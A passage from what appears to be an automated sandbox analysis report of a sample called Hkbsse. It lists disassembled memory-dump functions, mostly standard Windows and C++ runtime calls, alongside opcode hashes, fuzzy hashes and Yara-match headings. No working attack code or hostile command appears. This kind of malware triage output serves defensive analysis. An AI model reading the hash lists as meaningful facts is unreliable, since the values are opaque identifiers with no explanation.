                    • Instruction Fuzzy Hash: 7B110A75600215E7CB14EFA4ED49FEE33686F04301F614067F505E61D2DB389A04C66D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction ID: 0c802ae4ab2a979f088469e657098b65825bdc8a12ea5f1622e0d451203c6042
                    • Opcode Fuzzy Hash: dc6c705b50a0233cd7e36e16e7ee03d109a599ae8ac8f0e8377d12fdc1036c5f
                    • Instruction Fuzzy Hash: 50C125B0E08B499FEF15DF99C881BAE7BB0AF49314F04415BE541AB383D7789901CB69
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
                    • String ID:
                    • API String ID: 3943753294-0
                    • Opcode ID: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction ID: e22189b54f917ab80af51881bc3a2960e6f775f2bcb4490a15065f00f2756322
                    • Opcode Fuzzy Hash: 614b4e817c589673b728cf08dcfac44524a47e1cde47449f47a12751e0a585f6
                    • Instruction Fuzzy Hash: 87515C35900605DFDF24DF64C5C5A6A7BF4BF08315B2444AEE8069B262DB30FD41EBA5
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A13
                      • Part of subcall function 00425DC8: __EH_prolog3_catch.LIBCMT ref: 00425DCF
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00425E08
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 00427A21
                      • Part of subcall function 00426A2D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00426A52
                      • Part of subcall function 00426A2D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00426A75
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427A3A
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00427A46
                      • Part of subcall function 00425DC8: InterlockedPopEntrySList.KERNEL32(?), ref: 00425E51
                      • Part of subcall function 00425DC8: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00425E80
                      • Part of subcall function 00425DC8: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00425E8E
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00427A92
                    • Concurrency::location::_Assign.LIBCMT ref: 00427AB3
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00427ABB
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00427ACD
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00427AFD
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: b103386965f6d4094a94b484948c95d99d8643f9033d24ccfe4d2b4bf8a20aa7
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: 5A312430B082716ACF16AA7864927FF7BB59F41318F4400ABD442D7382DB2D5E0AC399
                    APIs
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044A7C7A
                      • Part of subcall function 044A602F: __EH_prolog3_catch.LIBCMT ref: 044A6036
                      • Part of subcall function 044A602F: Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044A606F
                    • Concurrency::details::SchedulerBase::NotifyThrottledContext.LIBCONCRT ref: 044A7C88
                      • Part of subcall function 044A6C94: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 044A6CB9
                      • Part of subcall function 044A6C94: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 044A6CDC
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044A7CA1
                    • Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 044A7CAD
                      • Part of subcall function 044A602F: RtlInterlockedPopEntrySList.NTDLL(?), ref: 044A60B8
                      • Part of subcall function 044A602F: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 044A60E7
                      • Part of subcall function 044A602F: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 044A60F5
                    • Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 044A7CF9
                    • Concurrency::location::_Assign.LIBCMT ref: 044A7D1A
                    • Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 044A7D22
                    • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 044A7D34
                    • Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 044A7D64
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
                    • String ID:
                    • API String ID: 2678502038-0
                    • Opcode ID: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction ID: 26d8f123b79431d937f7b98f315174defe49b8b6f32ef1184be1406a34a601ef
                    • Opcode Fuzzy Hash: 986a594d9c30ab416ef091d46fd7938cd3bae2acf70dbac93e6a4814106b4e22
                    • Instruction Fuzzy Hash: 0F31E630B042556BEF35AE7844917FEBBB59F61708F0404AFC881D7342DB25A965C7D1
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 00430AAC
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ABE
                    • GetCurrentThread.KERNEL32 ref: 00430AC6
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00425DBE,?), ref: 00430ACE
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00425DBE,?), ref: 00430AE7
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00430B08
                      • Part of subcall function 00420321: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 0042033B
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00425DBE,?), ref: 00430B1A
                    • GetLastError.KERNEL32(?,?,?,?,?,00425DBE,?), ref: 00430B45
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00430B5B
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: d0b6aa9362e501fbcad66dfed5f34ccefc820da40d4b047d48024504de478199
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: E8113A75600301ABC710AFB5AD5AF9F77A89F09705F140176F949D6253EA78E800C779
                    APIs
                    • GetCurrentThreadId.KERNEL32 ref: 044B0D13
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044A6025,?), ref: 044B0D25
                    • GetCurrentThread.KERNEL32 ref: 044B0D2D
                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,044A6025,?), ref: 044B0D35
                    • DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,044A6025,?), ref: 044B0D4E
                    • Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 044B0D6F
                      • Part of subcall function 044A0588: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 044A05A2
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,044A6025,?), ref: 044B0D81
                    • GetLastError.KERNEL32(?,?,?,?,?,044A6025,?), ref: 044B0DAC
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 044B0DC2
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
                    • String ID:
                    • API String ID: 1293880212-0
                    • Opcode ID: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction ID: 25e15127ba244c4d74df9ac4efd0bb9420c5a9d23b76875d4ce230f0bd9a8ba6
                    • Opcode Fuzzy Hash: 27d45d66322aed29ea19bd5ec75dcc7690659cc507f7251597d06f9f1e142a7c
                    • Instruction Fuzzy Hash: F511D575600300ABEF10AF759D49FDB37ACAF15746F18007AFD85D6292EA74E40087B5
                    APIs
                    • CoInitialize.OLE32(00000000), ref: 0040BA27
                    • CoCreateInstance.OLE32(00459010,00000000,00000001,00459020,?), ref: 0040BA43
                    • CoUninitialize.OLE32 ref: 0040BA51
                    • CoUninitialize.OLE32 ref: 0040BB10
                    • CoUninitialize.OLE32 ref: 0040BB24
                    Strings
                    • invalid stoi argument, xrefs: 0040E4A4
                    • stoi argument out of range, xrefs: 0040E49A
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Uninitialize$CreateInitializeInstance
                    • String ID: invalid stoi argument$stoi argument out of range
                    • API String ID: 1968832861-1606216832
                    • Opcode ID: 72bf0f80fe7a553fc4c0f57f12d513afca195860e21c68eb08472eb0fc6dd74f
                    • Instruction ID: 4ca269fc41c20fb2f42506ace009d3673a7e148846265e76edda467b4f27b292
                    • Opcode Fuzzy Hash: 72bf0f80fe7a553fc4c0f57f12d513afca195860e21c68eb08472eb0fc6dd74f
                    • Instruction Fuzzy Hash: 67418F71A00204AFDB04DF68CC49BAE77B5EB48715F10852AF405E7691D778A984CB99
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 00434987
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 0043498F
                    • _ValidateLocalCookies.LIBCMT ref: 00434A18
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00434A43
                    • _ValidateLocalCookies.LIBCMT ref: 00434A98
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: a:C$csm
                    • API String ID: 1170836740-2000533275
                    • Opcode ID: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction ID: 2ac7ba5ff52def4039f4e408c399c9b7849d7006bd45f8f6dc393843d2f98b86
                    • Opcode Fuzzy Hash: c6c3331f81419484f54866b6098c9c5dc2b5b23843a964c224861fa595cd409c
                    • Instruction Fuzzy Hash: D4410A34A00209ABCF10EF69C845ADF7BB4FF89318F14815BE9156B352D779EA01CB99
                    APIs
                    • _SpinWait.LIBCONCRT ref: 0041EFCC
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0041EFD8
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0041EFF1
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0041F01F
                    • Concurrency::Context::Block.LIBCONCRT ref: 0041F041
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID: yA
                    • API String ID: 1182035702-575552531
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: c1bac3c45397f19ff15f1c8079396faaf703d4cc50a356fec0ea894be16b9f48
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: F421D3B0D04209DADF24DFA5C8416EEBBF0AF04314F20052FE551A62D2E77D8ACACB59
                    APIs
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$___from_strstr_to_strchr
                    • String ID:
                    • API String ID: 3409252457-0
                    • Opcode ID: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction ID: e6aeac42739e6ab7cd66bc4c883525bdaa8889de24cd7337cf9c056b5eacb4ab
                    • Opcode Fuzzy Hash: 27eb51fbf8e6376bb8481d9dbec84d3bad0ef45d2e19943ccba9b84d58cff388
                    • Instruction Fuzzy Hash: 5A514871905302AFDF21AF77C842A6E7BA4AF0D314F14616FE5209B2C1EB7D89018B5D
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$InformationTimeZone
                    • String ID: XgE
                    • API String ID: 597776487-2984570469
                    • Opcode ID: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction ID: a51b9741262bd5fe43f3912e7d7025e293ddec3c87bb67f0f185d4e0872f58d5
                    • Opcode Fuzzy Hash: 59c2f5279e58139649a2571c75000e6f8904d99729dbbb22da82a7be1f3ea3b0
                    • Instruction Fuzzy Hash: 82C14A71900205AFEB14AF298E41BAF7BA9AF55354F9501AFF880D7381E7BC9E01C758
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: mtx_do_lock
                    • String ID: list too long
                    • API String ID: 1389037287-1124181908
                    • Opcode ID: 2ccdc388e6daa44e7db4bdf70043273ca535e2eef5ee75df55f5e5e35e32392c
                    • Instruction ID: 1de835894f33fb3089aea11bea25431999ae242630ff531b96c67452afae216b
                    • Opcode Fuzzy Hash: 2ccdc388e6daa44e7db4bdf70043273ca535e2eef5ee75df55f5e5e35e32392c
                    • Instruction Fuzzy Hash: DD61B7B0D04718ABDB20DF65CD89B99B7B4FF04304F1042ABE81DA7291E778A985CF59
                    APIs
                    • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00431C50
                      • Part of subcall function 00431F1F: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00431998), ref: 00431F2F
                    • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00431C65
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431C74
                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00431D38
                    Strings
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
                    • String ID: pContext$switchState
                    • API String ID: 1312548968-2660820399
                    • Opcode ID: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction ID: 28a58a2465d583a026d35ed57488f6c87d6b755b90b9bc2941db00793719cab4
                    • Opcode Fuzzy Hash: 46bbec9c4a74e2517c7a14b99cc54b57c0e90a5362bc5d5245cb815f45bf4e2b
                    • Instruction Fuzzy Hash: 2531D835A00214ABCF04EF65C885A6E7379BF5C314F20556BED11A73A2DB78EE05CB98
                    APIs
                    • Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E8E8
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E688
                      • Part of subcall function 0042E655: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 0042E6AA
                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042E965
                    • Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 0042E971
                    • Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E980
                    • Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E98A
                    • Concurrency::location::_Assign.LIBCMT ref: 0042E9BE
                    • Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E9C6
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
                    • String ID:
                    • API String ID: 1924466884-0
                    • Opcode ID: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction ID: 9694649e30401d41b72234d07e7418f217b5c7827242a2584a4def143e057733
                    • Opcode Fuzzy Hash: 276f9df07749c2586655dd60ba68681b8fe7d142fe2824faf373aa09bfa5bba4
                    • Instruction Fuzzy Hash: C9416B79A002149FCF04EF65D484BADB7B5FF48314F5480AAED499B382CB38AD41CB95
                    APIs
                    • __EH_prolog3.LIBCMT ref: 0449F1DD
                    • _SpinWait.LIBCONCRT ref: 0449F233
                    • Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 0449F23F
                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 0449F258
                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 0449F286
                    • Concurrency::Context::Block.LIBCONCRT ref: 0449F2A8
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::H_prolog3ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
                    • String ID:
                    • API String ID: 1888882079-0
                    • Opcode ID: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction ID: 32130f5271b1d6e058e9ae8c66524f69ea3e49c63c31f8801824dd9d7d1aec4e
                    • Opcode Fuzzy Hash: c4494c8ff7a1feda5b72c6a430cc6dcfbeaad5b25069e9d3fe1613b004dac074
                    • Instruction Fuzzy Hash: 232151749002198AEF28DFA4C8457EEBBF0AF05314F60051FD151E62D1E772AD48EB55
                    APIs
                      • Part of subcall function 0043F146: _free.LIBCMT ref: 0043F16B
                    • _free.LIBCMT ref: 0043F1CC
                      • Part of subcall function 0043AE95: HeapFree.KERNEL32(00000000,00000000,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?), ref: 0043AEAB
                      • Part of subcall function 0043AE95: GetLastError.KERNEL32(?,?,0043F170,?,00000000,?,?,?,0043F197,?,00000007,?,?,0043F599,?,?), ref: 0043AEBD
                    • _free.LIBCMT ref: 0043F1D7
                    • _free.LIBCMT ref: 0043F1E2
                    • _free.LIBCMT ref: 0043F236
                    • _free.LIBCMT ref: 0043F241
                    • _free.LIBCMT ref: 0043F24C
                    • _free.LIBCMT ref: 0043F257
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: 534b49149ef6fe1f5aaee1d96a2c981c71fb821ccbb97e781409d237b4b487e5
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: 6811A271980B04EADA31FBB2CC47FCBB7BD5F48708F40182EB29D6A052D63CB8188655
                    APIs
                      • Part of subcall function 044BF3AD: _free.LIBCMT ref: 044BF3D2
                    • _free.LIBCMT ref: 044BF433
                      • Part of subcall function 044BB0FC: HeapFree.KERNEL32(00000000,00000000,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?), ref: 044BB112
                      • Part of subcall function 044BB0FC: GetLastError.KERNEL32(?,?,044BF3D7,?,00000000,?,?,?,044BF3FE,?,00000007,?,?,044BF800,?,?), ref: 044BB124
                    • _free.LIBCMT ref: 044BF43E
                    • _free.LIBCMT ref: 044BF449
                    • _free.LIBCMT ref: 044BF49D
                    • _free.LIBCMT ref: 044BF4A8
                    • _free.LIBCMT ref: 044BF4B3
                    • _free.LIBCMT ref: 044BF4BE
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction ID: 96e588fad6a2d05644edcae4d2b8b1db16a55e2046c6a843a95729ccdb547896
                    • Opcode Fuzzy Hash: 1c92c1e39c368c871365a5fd099445d5bf14548ec3b822f22997ad0ae516ad5e
                    • Instruction Fuzzy Hash: 8911FC71A40B44EAED30FBB3CC06FDB7B9C9F04704F40581BB2EDA6552DE65B51A86A0
                    APIs
                    • GetModuleHandleW.KERNEL32(004512B4,?,00000000,00000000,?,?,?,044A3F5D), ref: 0449FDF6
                    • GetProcAddress.KERNEL32(00000000,0045177C), ref: 0449FE04
                    • GetProcAddress.KERNEL32(00000000,00451794), ref: 0449FE12
                    • GetProcAddress.KERNEL32(00000000,004517AC), ref: 0449FE40
                    • GetLastError.KERNEL32(?,?,?,044A3F5D), ref: 0449FE5B
                    • GetLastError.KERNEL32(?,?,?,044A3F5D), ref: 0449FE67
                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0449FE7D
                    Memory Dump Source
                    • Source File: 00000017.00000002.2275459263.0000000004480000.00000040.00001000.00020000.00000000.sdmp, Offset: 04480000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_4480000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorHandleModule
                    • String ID:
                    • API String ID: 1654681794-0
                    • Opcode ID: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction ID: 58735ed1e2fd5e85b8bc912feacad398eca1f64fe3f1388887776f2fbc52a4ae
                    • Opcode Fuzzy Hash: a0f3c5e5be5ec83283c824c3333a3d48fed157bf3d65dbaa9a2c4c53e6ba73a8
                    • Instruction Fuzzy Hash: B101A935500301ABBF107BB66C48BAB3BECA954756710052BB801D11A3EE78E4084768
                    APIs
                      • Part of subcall function 0041C7BC: mtx_do_lock.LIBCPMT ref: 0041C7C4
                    • __Mtx_unlock.LIBCPMT ref: 00416F21
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F72
                    • std::_Rethrow_future_exception.LIBCPMT ref: 00416F82
                    • __Mtx_unlock.LIBCPMT ref: 00417025
                    • __Mtx_unlock.LIBCPMT ref: 0041712B
                    • __Mtx_unlock.LIBCPMT ref: 00417166
                    Memory Dump Source
                    • Source File: 00000017.00000002.2273883657.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000017.00000002.2273883657.0000000000469000.00000040.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_23_2_400000_Hkbsse.jbxd
                    Yara matches
                    Similarity
                    • API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
                    • String ID:
                    • API String ID: 95294986-0
                    • Opcode ID: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
                    • Instruction ID: 57ef224f82db242419d5894fb4a60db898c918c1b4a24625dce6041fff2ac3f1
                    • Opcode Fuzzy Hash: aafa17d89b413720177f5b6f69086235258c7d952ed9bf80c33937c13f891e8a
